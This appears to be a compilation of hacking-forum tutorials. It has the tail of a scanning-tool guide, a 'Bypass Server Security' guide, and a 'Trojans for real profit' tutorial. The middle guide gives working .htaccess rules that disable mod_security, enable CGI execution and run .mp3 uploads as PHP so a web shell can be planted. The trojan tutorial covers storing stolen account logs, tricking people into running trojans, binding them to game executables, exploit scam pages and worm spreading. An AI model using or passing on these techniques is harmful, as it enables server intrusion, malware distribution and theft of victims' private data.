Nr.10 open Config and change thread from 10 to 400

Nr.11 Put start

Now Wait Be patient

NOTE : Resultat.Txt that you find IPs there Should be 150kb+!

NOTE : USE IT ON RDP/VPS

NTOE : Never USE it on ur OWN PC it will get Error

This method was for sell

But its free here

Enjoy

Hack&Peace ---> Make love, NOT war!

Thanks.

Bypass Server Security 100%

First thing if you can't use python , perl or cgi script to execute commands after giving to the script CHMOD 0755 the solution is to upload this variable php and edit it with the name of the file that you want to execute

NOTE: This guide is for educational purposes only I do not take any responsibility about anything happen after reading the guide. I'm only telling you how to do this not to do it. It's your decision.

exemple of a file: "perl.pl"

CODE:

<?
chmod("perl.pl" , 0755);
?>

Then save this file as ".php" extension.

If the host is very secured and you can't read directories or upload a file or edit a file just use this ".htaccess"

CODE:

<IfModule mod_security.c>
# Turn the filtering engine On or Off
SecFilterEngine Off
</IfModule>


Remember if perl don't work with the variable php just use this ".htaccess"


CODE:

Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .pl

AddHandler cgi-script .pl
AddHandler cgi-script .pl



For Python also same but change ".pl" to ".py" for cgi script use this ".htaccess"


CODE:


Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .root

AddHandler cgi-script .root
AddHandler cgi-script .root


If you want to Bypass Uploads Options and upload shell in another extension use this ".htaccess" :

CODE:

<FilesMatch "^.*\.mp3"> SetHandler application/x-httpd-php </FilesMatch>


For more Information check some old pastebin i posted ^_^

http://pastebin.com/NapunGnJ

http://pastebin.com/VJQN4AvF

You can find many if you search in Google Enj0y ;)

Thanks.

Trojans for real profit : Tutorial

This tutorial based on theory what you already have a Trojan for grabbing accounts and other private info of victim for you.

First of all after you bought trojan you need webserver, where all your logs will be kept. Using e-mail for it is a not a good idea. First your e-mail account can be stolen. Second thing is a restrictions on free box space and anti-spam features of mail provider. So if you have big botnet which send a lot of logs to you your account will reach free space and no new logs will be received and anti-spam feature can block most of mails sended to you by trojans. It’s hard to avoid anti-spam blocker coz all e-mail providers use their own anti-spam system and programmer should learn all that systems. It will take a lot of time and this game is not worth the candle.

So you need a hosting for storing logs. Most of hosting providers support PHP, ASP, MySQL and other features so you need just to choose what hosting provider you like more then others. Almost all hosting acceptable for use it for keeping logs.

All scripts what you need for my spyware included in package so all what you need is upload it and set right permissions to the files.

One thing you need at your hosting is a PHP option “register_globals” to be On. So check your hosting provider to allow this feature before purchasing hosting.

So we have a hosting. Next we need to distribute trojan to as much victims as we can.

There is a lot of ways to do it

Running the exe file:

If it's someone you know, you could try tricking them into running the file. Make up some story to get them to run it. After they run it, they will be infected with it.

You could also have it "hidden in another exe file". This is called exe binding, if you search google for it you will find a dozen exe binders. What this does is you get some exe file, perhaps an actual game, bind it to trojan, and get them to run the new exe file. What this will do is after you say "I just got a cool game, check it out" and send them the game&trojan exe, they won't suspect anything because it actually is a game.

Using an exploit

There are several exploits for Windows, for Internet Explorer, etc. An exploit is a flaw in the program that you can exploit to do a desired task. For example, there was a flaw in Internet Explorer a while back which allowed you to give a link to someone that would display anthing you wanted in the address bar and it would go to whatever website you wanted (eg display "http://www.ebay.com" while it actually went to "http://www.yourfakepage.com". Anyway, if you can find out what operating system your victim is using, you could try to find an exploit on the internet that allowed you to run remote code on their computer.

Most popular is exploits for Internet Explorer which upload and run trojan at victims computer.

People, who using this way making a scam page where they place an exploit and trojan and make people to visit their page. So then victim visit swindler’s page he will be infected by virus. It’s simple, but you have to compel people to visit your site. For this swindler using SPAM or companies who sell traffic, clicks or pop-up banner shows. Swindlers card traffic companies and they get people to visit your page and get infection. How they do it is a other story and to explain it I will have to write another tutorial, so lets keep it undisclosed. Just they force people to visit your site

Using RTSW.Smash I-WORM or other trojan droppers:

Another way is using a viruses called i-worms. This is a self-spreading systems which spread to victims computer by itself. It uses e-mail, p2p network, operating systems vulnerabilities, other backdoors/i-worms or other methods of spreading to infect a victim. After infection such programs can download to a victim any program you wish to victim computer. It can be trojan